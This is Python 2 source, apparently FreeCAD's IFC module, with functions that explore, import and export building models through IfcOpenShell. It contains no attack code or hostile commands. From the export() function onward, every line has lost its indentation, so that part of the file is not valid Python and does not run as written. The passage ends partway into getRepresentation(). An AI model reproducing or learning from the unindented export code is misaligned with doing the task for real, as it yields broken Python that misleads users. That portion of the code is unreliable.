#13=IFCSIUNIT(*,.LENGTHUNIT.,$,.METRE.);
#14=IFCSIUNIT(*,.AREAUNIT.,$,.SQUARE_METRE.);
#15=IFCSIUNIT(*,.VOLUMEUNIT.,$,.CUBIC_METRE.);
#16=IFCSIUNIT(*,.PLANEANGLEUNIT.,$,.RADIAN.);
#17=IFCMEASUREWITHUNIT(IFCPLANEANGLEMEASURE(0.017453292519943295),#16);
#18=IFCCONVERSIONBASEDUNIT(#12,.PLANEANGLEUNIT.,'DEGREE',#17);
#19=IFCUNITASSIGNMENT((#13,#14,#15,#18));
#20=IFCPROJECT('$projectid',#5,'$project',$,$,$,$,(#11),#19);
ENDSEC;
END-ISO-10303-21;
"""
def doubleClickTree(item,column):
    """Qt slot for the IFC explorer: when a double-clicked cell's text contains
    "Entity #<id>", scroll the global tree widget to that entity's own row
    and select it."""
    label = item.text(column)
    if "Entity #" not in label:
        return
    entity_id = label.split("#")[1].split(":")[0]
    matches = tree.findItems(entity_id,0,0)
    if matches:
        tree.scrollToItem(matches[0])
        matches[0].setSelected(True)
def explore(filename=None):
    """explore([filename]): opens a dialog showing
    the contents of an IFC file. If no filename is given, a dialog will
    pop up to choose a file."""
    p = FreeCAD.ParamGet("User parameter:BaseApp/Preferences/Mod/Arch")
    DEBUG = p.GetBool("ifcDebug",False)
    # ifcopenshell is an optional dependency; bail out gracefully if missing.
    try:
        import ifcopenshell
    except:
        FreeCAD.Console.PrintError("IfcOpenShell was not found on this system. IFC support is disabled\n")
        return
    if not filename:
        from PySide import QtGui
        filename = QtGui.QFileDialog.getOpenFileName(QtGui.qApp.activeWindow(),'IFC files','*.ifc')
        if filename:
            # getOpenFileName returns a (path, filter) tuple
            filename = filename[0]
    from PySide import QtCore,QtGui
    if isinstance(filename,unicode):
        import sys #workaround since ifcopenshell currently can't handle unicode filenames
        filename = filename.encode(sys.getfilesystemencoding())
    if not os.path.exists(filename):
        print "File not found"
        return
    ifc = ifcopenshell.open(filename)
    # the tree widget is kept global so doubleClickTree() can reach it
    global tree
    tree = QtGui.QTreeWidget()
    tree.setColumnCount(3)
    tree.setWordWrap(True)
    tree.header().setDefaultSectionSize(60)
    tree.header().resizeSection(0,60)
    tree.header().resizeSection(1,30)
    tree.header().setStretchLastSection(True)
    tree.headerItem().setText(0, "ID")
    tree.headerItem().setText(1, "")
    tree.headerItem().setText(2, "Item and Properties")
    bold = QtGui.QFont()
    bold.setWeight(75)
    bold.setBold(True)
    # gather the entity classes worth displaying, sorted by numeric id
    entities = ifc.by_type("IfcRoot")
    entities += ifc.by_type("IfcRepresentation")
    entities += ifc.by_type("IfcRepresentationItem")
    entities += ifc.by_type("IfcPlacement")
    entities += ifc.by_type("IfcProperty")
    entities += ifc.by_type("IfcPhysicalSimpleQuantity")
    entities += ifc.by_type("IfcMaterial")
    entities = sorted(entities, key=lambda eid: eid.id())
    done = []
    for entity in entities:
        if hasattr(entity,"id"):
            # by_type() queries can return the same entity twice; show it once
            if entity.id() in done:
                continue
            done.append(entity.id())
            item = QtGui.QTreeWidgetItem(tree)
            item.setText(0,str(entity.id()))
            # pick a FreeCAD icon matching the entity class, when we have one
            if entity.is_a() in ["IfcWall","IfcWallStandardCase"]:
                item.setIcon(1,QtGui.QIcon(":icons/Arch_Wall_Tree.svg"))
            elif entity.is_a() in ["IfcBuildingElementProxy"]:
                item.setIcon(1,QtGui.QIcon(":icons/Arch_Component.svg"))
            elif entity.is_a() in ["IfcColumn","IfcColumnStandardCase","IfcBeam","IfcBeamStandardCase","IfcSlab","IfcFooting","IfcPile","IfcTendon"]:
                item.setIcon(1,QtGui.QIcon(":icons/Arch_Structure_Tree.svg"))
            elif entity.is_a() in ["IfcSite"]:
                item.setIcon(1,QtGui.QIcon(":icons/Arch_Site_Tree.svg"))
            elif entity.is_a() in ["IfcBuilding"]:
                item.setIcon(1,QtGui.QIcon(":icons/Arch_Building_Tree.svg"))
            elif entity.is_a() in ["IfcBuildingStorey"]:
                item.setIcon(1,QtGui.QIcon(":icons/Arch_Floor_Tree.svg"))
            elif entity.is_a() in ["IfcWindow","IfcWindowStandardCase","IfcDoor","IfcDoorStandardCase"]:
                item.setIcon(1,QtGui.QIcon(":icons/Arch_Window_Tree.svg"))
            elif entity.is_a() in ["IfcRoof"]:
                item.setIcon(1,QtGui.QIcon(":icons/Arch_Roof_Tree.svg"))
            elif entity.is_a() in ["IfcExtrudedAreaSolid","IfcClosedShell"]:
                item.setIcon(1,QtGui.QIcon(":icons/Tree_Part.svg"))
            elif entity.is_a() in ["IfcFace"]:
                item.setIcon(1,QtGui.QIcon(":icons/Draft_SwitchMode.svg"))
            elif entity.is_a() in ["IfcArbitraryClosedProfileDef","IfcPolyloop"]:
                item.setIcon(1,QtGui.QIcon(":icons/Draft_Draft.svg"))
            elif entity.is_a() in ["IfcPropertySingleValue","IfcQuantityArea","IfcQuantityVolume"]:
                item.setIcon(1,QtGui.QIcon(":icons/Tree_Annotation.svg"))
            elif entity.is_a() in ["IfcMaterial"]:
                item.setIcon(1,QtGui.QIcon(":icons/Arch_Material.svg"))
            item.setText(2,str(entity.is_a()))
            item.setFont(2,bold);
            # walk the entity's attributes by index until attribute_name raises
            i = 0
            while True:
                try:
                    argname = entity.attribute_name(i)
                except:
                    break
                else:
                    try:
                        argvalue = getattr(entity,argname)
                    except:
                        print "Error in entity ",entity
                        break
                    else:
                        if not argname in ["Id", "GlobalId"]:
                            colored = False
                            if isinstance(argvalue,ifcopenshell.entity_instance):
                                if argvalue.id() == 0:
                                    t = str(argvalue)
                                else:
                                    # cross-reference: shown in blue, clickable
                                    colored = True
                                    t = "Entity #" + str(argvalue.id()) + ": " + str(argvalue.is_a())
                            elif isinstance(argvalue,list):
                                t = ""
                            else:
                                t = str(argvalue)
                            t = " " + str(argname) + " : " + str(t)
                            item = QtGui.QTreeWidgetItem(tree)
                            item.setText(2,str(t))
                            if colored:
                                item.setForeground(2,QtGui.QBrush(QtGui.QColor("#005AFF")))
                            # list-valued attributes get one child row per element
                            if isinstance(argvalue,list):
                                for argitem in argvalue:
                                    colored = False
                                    if isinstance(argitem,ifcopenshell.entity_instance):
                                        if argitem.id() == 0:
                                            t = str(argitem)
                                        else:
                                            colored = True
                                            t = "Entity #" + str(argitem.id()) + ": " + str(argitem.is_a())
                                    else:
                                        t = argitem
                                    t = " " + str(t)
                                    item = QtGui.QTreeWidgetItem(tree)
                                    item.setText(2,str(t))
                                    if colored:
                                        item.setForeground(2,QtGui.QBrush(QtGui.QColor("#005AFF")))
                i += 1
    # show the tree in a modal dialog
    d = QtGui.QDialog()
    d.setObjectName("IfcExplorer")
    d.setWindowTitle("Ifc Explorer")
    d.resize(640, 480)
    layout = QtGui.QVBoxLayout(d)
    layout.addWidget(tree)
    tree.itemDoubleClicked.connect(doubleClickTree)
    d.exec_()
    del tree
    return
def open(filename,skip=[],only=[],root=None):
    """Open an IFC file into a brand-new FreeCAD document and import its
    contents via insert(). Deliberately shadows the builtin open() (which is
    preserved as pyopen at module level). Returns the populated document."""
    basename = os.path.basename(filename)
    docname = os.path.splitext(basename)[0]
    newdoc = FreeCAD.newDocument(docname)
    newdoc.Label = docname
    return insert(filename,newdoc.Name,skip,only,root)
def insert(filename,docname,skip=[],only=[],root=None):
    """insert(filename,docname,skip=[],only=[],root=None): imports the contents of an IFC file.
    skip can contain a list of ids of objects to be skipped, only can restrict the import to
    certain object ids (will also get their children) and root can be used to
    import only the derivates of a certain element type (default = ifcProduct)."""
    # read the user's Arch import preferences
    p = FreeCAD.ParamGet("User parameter:BaseApp/Preferences/Mod/Arch")
    DEBUG = p.GetBool("ifcDebug",False)
    PREFIX_NUMBERS = p.GetBool("ifcPrefixNumbers",False)
    SKIP = p.GetString("ifcSkip","").split(",")
    SEPARATE_OPENINGS = p.GetBool("ifcSeparateOpenings",False)
    ROOT_ELEMENT = p.GetString("ifcRootElement","IfcProduct")
    GET_EXTRUSIONS = p.GetBool("ifcGetExtrusions",False)
    MERGE_MATERIALS = p.GetBool("ifcMergeMaterials",False)
    if root:
        ROOT_ELEMENT = root
    MERGE_MODE = p.GetInt("ifcImportMode",0)
    # merge modes (>0) build plain shapes, so parametric features are disabled
    if MERGE_MODE > 0:
        SEPARATE_OPENINGS = False
        GET_EXTRUSIONS = False
    if not SEPARATE_OPENINGS:
        SKIP.append("IfcOpeningElement")
    try:
        import ifcopenshell
    except:
        FreeCAD.Console.PrintError("IfcOpenShell was not found on this system. IFC support is disabled\n")
        return
    if DEBUG: print "Opening ",filename,"...",
    # reuse the named document if it exists, otherwise create it
    try:
        doc = FreeCAD.getDocument(docname)
    except:
        doc = FreeCAD.newDocument(docname)
    FreeCAD.ActiveDocument = doc
    if DEBUG: print "done."
    global ifcfile # keeping global for debugging purposes
    if isinstance(filename,unicode):
        import sys #workaround since ifcopenshell currently can't handle unicode filenames
        filename = filename.encode(sys.getfilesystemencoding())
    ifcfile = ifcopenshell.open(filename)
    # configure ifcopenshell geometry settings: BREP output, sewn shells,
    # world coordinates (and untouched openings when imported separately)
    from ifcopenshell import geom
    settings = ifcopenshell.geom.settings()
    settings.set(settings.USE_BREP_DATA,True)
    settings.set(settings.SEW_SHELLS,True)
    settings.set(settings.USE_WORLD_COORDS,True)
    if SEPARATE_OPENINGS:
        settings.set(settings.DISABLE_OPENING_SUBTRACTIONS,True)
    sites = ifcfile.by_type("IfcSite")
    buildings = ifcfile.by_type("IfcBuilding")
    floors = ifcfile.by_type("IfcBuildingStorey")
    products = ifcfile.by_type(ROOT_ELEMENT)
    openings = ifcfile.by_type("IfcOpeningElement")
    annotations = ifcfile.by_type("IfcAnnotation")
    materials = ifcfile.by_type("IfcMaterial")
    if DEBUG: print "Building relationships table...",
    # building relations tables
    objects = {} # { id:object, ... }
    additions = {} # { host:[child,...], ... }
    subtractions = [] # [ [opening,host], ... ]
    properties = {} # { host:[property, ...], ... }
    colors = {} # { id:(r,g,b) }
    shapes = {} # { id:shape } only used for merge mode
    mattable = {} # { objid:matid }
    for r in ifcfile.by_type("IfcRelContainedInSpatialStructure"):
        additions.setdefault(r.RelatingStructure.id(),[]).extend([e.id() for e in r.RelatedElements])
    for r in ifcfile.by_type("IfcRelAggregates"):
        additions.setdefault(r.RelatingObject.id(),[]).extend([e.id() for e in r.RelatedObjects])
    for r in ifcfile.by_type("IfcRelVoidsElement"):
        subtractions.append([r.RelatedOpeningElement.id(), r.RelatingBuildingElement.id()])
    for r in ifcfile.by_type("IfcRelDefinesByProperties"):
        for obj in r.RelatedObjects:
            if r.RelatingPropertyDefinition.is_a("IfcPropertySet"):
                properties.setdefault(obj.id(),[]).extend([e.id() for e in r.RelatingPropertyDefinition.HasProperties])
    for r in ifcfile.by_type("IfcRelAssociatesMaterial"):
        for o in r.RelatedObjects:
            mattable[o.id()] = r.RelatingMaterial.id()
    # resolve surface colors: a styled item either colors the product whose
    # representation contains it (r.Item set), or colors a material
    for r in ifcfile.by_type("IfcStyledItem"):
        if r.Styles[0].is_a("IfcPresentationStyleAssignment"):
            if r.Styles[0].Styles[0].is_a("IfcSurfaceStyle"):
                if r.Styles[0].Styles[0].Styles[0].is_a("IfcSurfaceStyleRendering"):
                    if r.Styles[0].Styles[0].Styles[0].SurfaceColour:
                        c = r.Styles[0].Styles[0].Styles[0].SurfaceColour
                        if r.Item:
                            for p in ifcfile.by_type("IfcProduct"):
                                if p.Representation:
                                    for it in p.Representation.Representations:
                                        if it.Items:
                                            if it.Items[0].id() == r.Item.id():
                                                colors[p.id()] = (c.Red,c.Green,c.Blue)
                                            elif it.Items[0].is_a("IfcBooleanResult"):
                                                if (it.Items[0].FirstOperand.id() == r.Item.id()):
                                                    colors[p.id()] = (c.Red,c.Green,c.Blue)
                        else:
                            for m in ifcfile.by_type("IfcMaterialDefinitionRepresentation"):
                                for it in m.Representations:
                                    if it.Items:
                                        if it.Items[0].id() == r.id():
                                            colors[m.RepresentedMaterial.id()] = (c.Red,c.Green,c.Blue)
    if only: # only import a list of IDs and their children
        # NOTE: this mutates the caller's `only` list (pop/extend)
        ids = []
        while only:
            currentid = only.pop()
            ids.append(currentid)
            if currentid in additions.keys():
                only.extend(additions[currentid])
        products = [ifcfile[currentid] for currentid in ids]
    if DEBUG: print "done."
    count = 0
    from FreeCAD import Base
    progressbar = Base.ProgressIndicator()
    progressbar.start("Importing IFC objects...",len(products))
    # products
    for product in products:
        pid = product.id()
        guid = product.GlobalId
        ptype = product.is_a()
        if DEBUG: print count,"/",len(products)," creating object ",pid," : ",ptype,
        # default object name is the IFC class without its "Ifc" prefix
        name = str(ptype[3:])
        if product.Name:
            name = product.Name.decode("unicode_escape").encode("utf8")
        if PREFIX_NUMBERS: name = "ID" + str(pid) + " " + name
        obj = None
        baseobj = None
        brep = None
        if pid in skip: # user given id skip list
            if DEBUG: print " skipped."
            continue
        if ptype in SKIP: # preferences-set type skip list
            if DEBUG: print " skipped."
            continue
        try:
            cr = ifcopenshell.geom.create_shape(settings,product)
            brep = cr.geometry.brep_data
        except:
            pass # IfcOpenShell will yield an error if a given product has no shape, but we don't care
        if brep:
            if DEBUG: print " ",str(len(brep)/1000),"k ",
            shape = Part.Shape()
            shape.importBrepFromString(brep)
            shape.scale(1000.0) # IfcOpenShell always outputs in meters
            if not shape.isNull():
                if MERGE_MODE > 0:
                    if ptype == "IfcSpace": # do not add spaces to compounds
                        if DEBUG: print "skipping space ",pid
                    else:
                        shapes[pid] = shape
                        if DEBUG: print shape.Solids
                        baseobj = shape
                else:
                    # full parametric mode: try to recover an extrusion first
                    if GET_EXTRUSIONS:
                        ex = Arch.getExtrusionData(shape)
                        if ex:
                            print "extrusion ",
                            baseface = FreeCAD.ActiveDocument.addObject("Part::Feature",name+"_footprint")
                            baseface.Shape = ex[0]
                            baseobj = FreeCAD.ActiveDocument.addObject("Part::Extrusion",name+"_body")
                            baseobj.Base = baseface
                            baseobj.Dir = ex[1]
                            if FreeCAD.GuiUp:
                                baseface.ViewObject.hide()
                    if not baseobj:
                        baseobj = FreeCAD.ActiveDocument.addObject("Part::Feature",name+"_body")
                        baseobj.Shape = shape
            else:
                if DEBUG: print "null shape ",
            if not shape.isValid():
                if DEBUG: print "invalid shape ",
                #continue
        else:
            if DEBUG: print " no brep ",
        if MERGE_MODE == 0:
            # full Arch objects
            for freecadtype,ifctypes in typesmap.items():
                if ptype in ifctypes:
                    obj = getattr(Arch,"make"+freecadtype)(baseobj=baseobj,name=name)
                    obj.Label = name
                    if FreeCAD.GuiUp and baseobj:
                        baseobj.ViewObject.hide()
                    # setting role
                    try:
                        r = ptype[3:]
                        # translationtable maps FreeCAD->IFC; invert it here
                        tr = dict((v,k) for k, v in translationtable.iteritems())
                        if r in tr.keys():
                            r = tr[r]
                        # remove the "StandardCase"
                        if "StandardCase" in r:
                            r = r[:-12]
                        obj.Role = r
                    except:
                        pass
                    # setting uid
                    if hasattr(obj,"IfcAttributes"):
                        a = obj.IfcAttributes
                        a["IfcUID"] = str(guid)
                        obj.IfcAttributes = a
                    break
            if not obj:
                # unknown IFC class: fall back to a generic Arch component
                obj = Arch.makeComponent(baseobj,name=name)
            if obj:
                sols = str(obj.Shape.Solids) if hasattr(obj,"Shape") else "[]"
                if DEBUG: print sols
                objects[pid] = obj
        elif MERGE_MODE == 1:
            # non-parametric Arch objects
            if ptype in ["IfcSite","IfcBuilding","IfcBuildingStorey"]:
                for freecadtype,ifctypes in typesmap.items():
                    if ptype in ifctypes:
                        obj = getattr(Arch,"make"+freecadtype)(baseobj=None,name=name)
            elif baseobj:
                obj = Arch.makeComponent(baseobj,name=name,delete=True)
        elif MERGE_MODE == 2:
            # Part shapes
            if ptype in ["IfcSite","IfcBuilding","IfcBuildingStorey"]:
                for freecadtype,ifctypes in typesmap.items():
                    if ptype in ifctypes:
                        obj = getattr(Arch,"make"+freecadtype)(baseobj=None,name=name)
            elif baseobj:
                obj = FreeCAD.ActiveDocument.addObject("Part::Feature",name)
                obj.Shape = shape
        if obj:
            obj.Label = name
            objects[pid] = obj
            # properties
            if pid in properties:
                if hasattr(obj,"IfcAttributes"):
                    a = obj.IfcAttributes
                    for p in properties[pid]:
                        o = ifcfile[p]
                        if o.is_a("IfcPropertySingleValue"):
                            a[o.Name.decode("unicode_escape").encode("utf8")] = str(o.NominalValue)
                    obj.IfcAttributes = a
            # color
            if FreeCAD.GuiUp and (pid in colors) and hasattr(obj.ViewObject,"ShapeColor"):
                if DEBUG: print " setting color: ",colors[pid]
                obj.ViewObject.ShapeColor = colors[pid]
        # if DEBUG is on, recompute after each shape
        if DEBUG: FreeCAD.ActiveDocument.recompute()
        count += 1
        progressbar.next()
    progressbar.stop()
    FreeCAD.ActiveDocument.recompute()
    if MERGE_MODE == 3:
        # join all collected shapes into one compound per building storey
        if DEBUG: print "Joining shapes..."
        for host,children in additions.items():
            if ifcfile[host].is_a("IfcBuildingStorey"):
                compound = []
                for c in children:
                    if c in shapes.keys():
                        compound.append(shapes[c])
                        del shapes[c]
                    if c in additions.keys():
                        # also claim grandchildren aggregated under this child
                        for c2 in additions[c]:
                            if c2 in shapes.keys():
                                compound.append(shapes[c2])
                                del shapes[c2]
                if compound:
                    name = ifcfile[host].Name or "Floor"
                    if PREFIX_NUMBERS: name = "ID" + str(host) + " " + name
                    obj = FreeCAD.ActiveDocument.addObject("Part::Feature",name)
                    obj.Label = name
                    obj.Shape = Part.makeCompound(compound)
        if shapes: # remaining shapes
            obj = FreeCAD.ActiveDocument.addObject("Part::Feature","Unclaimed")
            obj.Shape = Part.makeCompound(shapes.values())
    else:
        if DEBUG: print "Processing relationships..."
        # subtractions
        if SEPARATE_OPENINGS:
            for subtraction in subtractions:
                if (subtraction[0] in objects.keys()) and (subtraction[1] in objects.keys()):
                    if DEBUG: print "subtracting ",objects[subtraction[0]].Label, " from ", objects[subtraction[1]].Label
                    Arch.removeComponents(objects[subtraction[0]],objects[subtraction[1]])
                    if DEBUG: FreeCAD.ActiveDocument.recompute()
        # additions
        for host,children in additions.items():
            if host in objects.keys():
                cobs = [objects[child] for child in children if child in objects.keys()]
                if cobs:
                    if DEBUG and (len(cobs) > 10) and ( not(Draft.getType(objects[host]) in ["Site","Building","Floor"])):
                        # avoid huge fusions
                        print "more than 10 shapes to add: skipping."
                    else:
                        if DEBUG: print "adding ",len(cobs), " object(s) to ", objects[host].Label
                        Arch.addComponents(cobs,objects[host])
                        if DEBUG: FreeCAD.ActiveDocument.recompute()
        FreeCAD.ActiveDocument.recompute()
        # cleaning bad shapes
        for obj in objects.values():
            if obj.isDerivedFrom("Part::Feature"):
                if obj.Shape.isNull():
                    Arch.rebuildArchShape(obj)
    FreeCAD.ActiveDocument.recompute()
    # 2D elements
    if DEBUG and annotations: print "Creating 2D geometry..."
    for annotation in annotations:
        aid = annotation.id()
        if aid in skip: continue # user given id skip list
        if "IfcAnnotation" in SKIP: continue # preferences-set type skip list
        name = "Annotation"
        if annotation.Name:
            name = annotation.Name.decode("unicode_escape").encode("utf8")
        if PREFIX_NUMBERS: name = "ID" + str(aid) + " " + name
        shapes2d = []
        for repres in annotation.Representation.Representations:
            # setRepresentation() is defined elsewhere in this module
            shapes2d.extend(setRepresentation(repres))
        if shapes2d:
            sh = Part.makeCompound(shapes2d)
            pc = str(int((float(count)/(len(products)+len(annotations))*100)))+"% "
            if DEBUG: print pc,"creating object ",aid," : Annotation with shape: ",sh
            o = FreeCAD.ActiveDocument.addObject("Part::Feature",name)
            o.Shape = sh
        count += 1
    FreeCAD.ActiveDocument.recompute()
    # Materials
    if DEBUG and materials: print "Creating materials..."
    fcmats = {}
    for material in materials:
        name = "Material"
        if material.Name:
            name = material.Name.decode("unicode_escape").encode("utf8")
        # with MERGE_MATERIALS, same-named IFC materials share one Arch material
        if MERGE_MATERIALS and (name in fcmats.keys()):
            mat = fcmats[name]
        else:
            mat = Arch.makeMaterial(name=name)
            mdict = {}
            if material.id() in colors:
                mdict["Color"] = str(colors[material.id()])
            if mdict:
                mat.Material = mdict
            fcmats[name] = mat
        for o,m in mattable.items():
            if m == material.id():
                if o in objects:
                    if hasattr(objects[o],"BaseMaterial"):
                        objects[o].BaseMaterial = mat
    FreeCAD.ActiveDocument.recompute()
    if FreeCAD.GuiUp:
        import FreeCADGui
        FreeCADGui.SendMsgToActiveView("ViewFit")
    print "Finished importing."
    return doc
def export(exportList,filename):
"exports FreeCAD contents to an IFC file"
p = FreeCAD.ParamGet("User parameter:BaseApp/Preferences/Mod/Arch")
FORCEBREP = p.GetBool("ifcExportAsBrep",False)
DEBUG = p.GetBool("ifcDebug",False)
try:
global ifcopenshell
import ifcopenshell
except:
FreeCAD.Console.PrintError("IfcOpenShell was not found on this system. IFC support is disabled\n")
return
if isinstance(filename,unicode):
import sys #workaround since ifcopenshell currently can't handle unicode filenames
filename = filename.encode(sys.getfilesystemencoding())
version = FreeCAD.Version()
owner = FreeCAD.ActiveDocument.CreatedBy
email = ''
if ("@" in owner) and ("<" in owner):
s = owner.split("<")
owner = s[0]
email = s[1].strip(">")
global ifctemplate
ifctemplate = ifctemplate.replace("$version",version[0]+"."+version[1]+" build "+version[2])
ifctemplate = ifctemplate.replace("$owner",owner)
ifctemplate = ifctemplate.replace("$company",FreeCAD.ActiveDocument.Company)
ifctemplate = ifctemplate.replace("$email",email)
ifctemplate = ifctemplate.replace("$now",str(int(time.time())))
ifctemplate = ifctemplate.replace("$projectid",FreeCAD.ActiveDocument.Uid[:22].replace("-","_"))
ifctemplate = ifctemplate.replace("$project",FreeCAD.ActiveDocument.Name)
ifctemplate = ifctemplate.replace("$filename",filename)
ifctemplate = ifctemplate.replace("$timestamp",str(time.strftime("%Y-%m-%dT%H:%M:%S", time.gmtime())))
template = tempfile.mkstemp(suffix=".ifc")[1]
of = pyopen(template,"wb")
of.write(ifctemplate)
of.close()
global ifcfile, surfstyles
ifcfile = ifcopenshell.open(template)
history = ifcfile.by_type("IfcOwnerHistory")[0]
context = ifcfile.by_type("IfcGeometricRepresentationContext")[0]
project = ifcfile.by_type("IfcProject")[0]
objectslist = Draft.getGroupContents(exportList,walls=True,addgroups=True)
objectslist = Arch.pruneIncluded(objectslist)
products = {} # { Name: IfcEntity, ... }
surfstyles = {} # { (r,g,b): IfcEntity, ... }
count = 1
# products
for obj in objectslist:
# getting generic data
name = str(obj.Label.encode("utf8"))
description = str(obj.Description) if hasattr(obj,"Description") else ""
# getting uid
uid = None
if hasattr(obj,"IfcAttributes"):
if "IfcUID" in obj.IfcAttributes.keys():
uid = str(obj.IfcAttributes["IfcUID"])
if not uid:
uid = ifcopenshell.guid.compress(uuid.uuid1().hex)
# setting the IFC type + name conversions
if hasattr(obj,"Role"):
ifctype = obj.Role.replace(" ","")
else:
ifctype = Draft.getType(obj)
if ifctype in translationtable.keys():
ifctype = translationtable[ifctype]
ifctype = "Ifc" + ifctype
if ifctype == "IfcGroup":
continue
ifctypes = []
for v in typesmap.values():
ifctypes.extend(v)
if not ifctype in ifctypes:
ifctype = "IfcBuildingElementProxy"
# getting the "Force BREP" flag
brepflag = False
if hasattr(obj,"IfcAttributes"):
if "FlagForceBrep" in obj.IfcAttributes.keys():
if obj.IfcAttributes["FlagForceBrep"] == "True":
brepflag = True
# getting the representation
representation,placement,shapetype = getRepresentation(ifcfile,context,obj,forcebrep=(brepflag or FORCEBREP))
if DEBUG: print str(count).ljust(3)," : ", ifctype, " (",shapetype,") : ",name
# setting the arguments
args = [uid,history,name,description,None,placement,representation,None]
if ifctype in ["IfcSlab","IfcFooting","IfcRoof"]:
args = args + ["NOTDEFINED"]
elif ifctype in ["IfcWindow","IfcDoor"]:
args = args + [obj.Width.Value/1000.0, obj.Height.Value/1000.0]
elif ifctype == "IfcSpace":
args = args + ["ELEMENT","INTERNAL",obj.Shape.BoundBox.ZMin/1000.0]
elif ifctype == "IfcBuildingElementProxy":
args = args + ["ELEMENT"]
elif ifctype == "IfcSite":
latitude = None
longitude = None
elevation = None
landtitlenumber = None
address = None
args = args + ["ELEMENT",latitude,longitude,elevation,landtitlenumber,address]
elif ifctype == "IfcBuilding":
args = args + ["ELEMENT",None,None,None]
elif ifctype == "IfcBuildingStorey":
args = args + ["ELEMENT",obj.Placement.Base.z]
# creating the product
product = getattr(ifcfile,"create"+ifctype)(*args)
products[obj.Name] = product
# additions
if hasattr(obj,"Additions") and (shapetype == "extrusion"):
for o in obj.Additions:
r2,p2,c2 = getRepresentation(ifcfile,context,o,forcebrep=True)
if DEBUG: print " adding ",c2," : ",str(o.Label)
prod2 = ifcfile.createIfcBuildingElementProxy(ifcopenshell.guid.compress(uuid.uuid1().hex),history,str(o.Label),None,None,p2,r2,None,"ELEMENT")
ifcfile.createIfcRelAggregates(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'Addition','',product,[prod2])
# subtractions
if hasattr(obj,"Subtractions") and (shapetype == "extrusion"):
for o in obj.Subtractions:
r2,p2,c2 = getRepresentation(ifcfile,context,o,forcebrep=True,subtraction=True)
if DEBUG: print " subtracting ",c2," : ",str(o.Label)
prod2 = ifcfile.createIfcOpeningElement(ifcopenshell.guid.compress(uuid.uuid1().hex),history,str(o.Label),None,None,p2,r2,None)
ifcfile.createIfcRelVoidsElement(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'Subtraction','',product,prod2)
# properties
if hasattr(obj,"IfcAttributes"):
props = []
for key in obj.IfcAttributes:
if not (key in ["IfcUID","FlagForceBrep"]):
r = obj.IfcAttributes[key].strip(")").split("(")
if len(r) == 1:
tp = "IfcText"
val = r[0]
else:
tp = r[0]
val = "(".join(r[1:])
val = val.strip("'")
val = val.strip('"')
if DEBUG: print " property ",key," : ",str(val), " (", str(tp), ")"
if tp in ["IfcLabel","IfcText","IfcIdentifier"]:
val = str(val)
elif tp == "IfcBoolean":
if val == ".T.":
val = True
else:
val = False
elif tp == "IfcInteger":
val = int(val)
else:
val = float(val)
props.append(ifcfile.createIfcPropertySingleValue(str(key),None,ifcfile.create_entity(str(tp),val),None))
if props:
pset = ifcfile.createIfcPropertySet(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'PropertySet',None,props)
ifcfile.createIfcRelDefinesByProperties(ifcopenshell.guid.compress(uuid.uuid1().hex),history,None,None,[product],pset)
count += 1
# relationships
sites = []
buildings = []
floors = []
for site in Draft.getObjectsOfType(objectslist,"Site"):
for building in Draft.getObjectsOfType(site.Group,"Building"):
for floor in Draft.getObjectsOfType(building.Group,"Floor"):
children = Draft.getGroupContents(floor,walls=True)
children = Arch.pruneIncluded(children)
children = [products[c.Name] for c in children if c.Name in products.keys()]
floor = products[floor.Name]
ifcfile.createIfcRelContainedInSpatialStructure(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'StoreyLink','',children,floor)
floors.append(floor)
building = products[building.Name]
if floors:
ifcfile.createIfcRelAggregates(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'BuildingLink','',building,floors)
buildings.append(building)
site = products[site.Name]
if buildings:
ifcfile.createIfcRelAggregates(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'SiteLink','',site,buildings)
sites.append(site)
if not sites:
if DEBUG: print "adding default site"
sites = [ifcfile.createIfcSite(ifcopenshell.guid.compress(uuid.uuid1().hex),history,"Default Site",'',None,None,None,None,"ELEMENT",None,None,None,None,None)]
ifcfile.createIfcRelAggregates(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'ProjectLink','',project,sites)
if not buildings:
if DEBUG: print "adding default building"
buildings = [ifcfile.createIfcBuilding(ifcopenshell.guid.compress(uuid.uuid1().hex),history,"Default Building",'',None,None,None,None,"ELEMENT",None,None,None)]
ifcfile.createIfcRelAggregates(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'SiteLink','',sites[0],buildings)
ifcfile.createIfcRelContainedInSpatialStructure(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'BuildingLink','',products.values(),buildings[0])
# materials
materials = {}
for m in Arch.getDocumentMaterials():
mat = ifcfile.createIfcMaterial(m.Label.encode("utf8"))
materials[m.Label] = mat
if "Color" in m.Material:
rgb = tuple([float(f) for f in m.Material['Color'].strip("()").split(",")])
col = ifcfile.createIfcColourRgb(None,rgb[0],rgb[1],rgb[2])
ssr = ifcfile.createIfcSurfaceStyleRendering(col,None,None,None,None,None,None,None,"FLAT")
iss = ifcfile.createIfcSurfaceStyle(None,"BOTH",[ssr])
psa = ifcfile.createIfcPresentationStyleAssignment([iss])
isi = ifcfile.createIfcStyledItem(None,[psa],None)
isr = ifcfile.createIfcStyledRepresentation(context,"Style","Material",[isi])
imd = ifcfile.createIfcMaterialDefinitionRepresentation(None,None,[isr],mat)
relobjs = []
for o in m.InList:
if hasattr(o,"BaseMaterial"):
if o.BaseMaterial:
if o.BaseMaterial.Name == m.Name:
if o.Name in products:
relobjs.append(products[o.Name])
if relobjs:
ifcfile.createIfcRelAssociatesMaterial(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'MaterialLink','',relobjs,mat)
if DEBUG: print "writing ",filename,"..."
ifcfile.write(filename)
def getRepresentation(ifcfile,context,obj,forcebrep=False,subtraction=False,tessellation=1):
"""returns an IfcShapeRepresentation object or None"""
import Part,math,DraftGeomUtils,DraftVecUtils
shapes = []
placement = None
productdef = None
shapetype = "no shape"
if not forcebrep:
profile = None
if hasattr(obj,"Proxy"):
if hasattr(obj.Proxy,"getProfiles"):
p = obj.Proxy.getProfiles(obj,noplacement=True)
extrusionv = obj.Proxy.getExtrusionVector(obj,noplacement=True)
if not DraftVecUtils.isNull(extrusionv):
extrusionv.multiply(0.001) # to meters
if (len(p) == 1) and extrusionv:
p = p[0]
p.scale(0.001) # to meters
r = obj.Proxy.getPlacement(obj)
r.Base = r.Base.multiply(0.001) # to meters
if len(p.Edges) == 1:
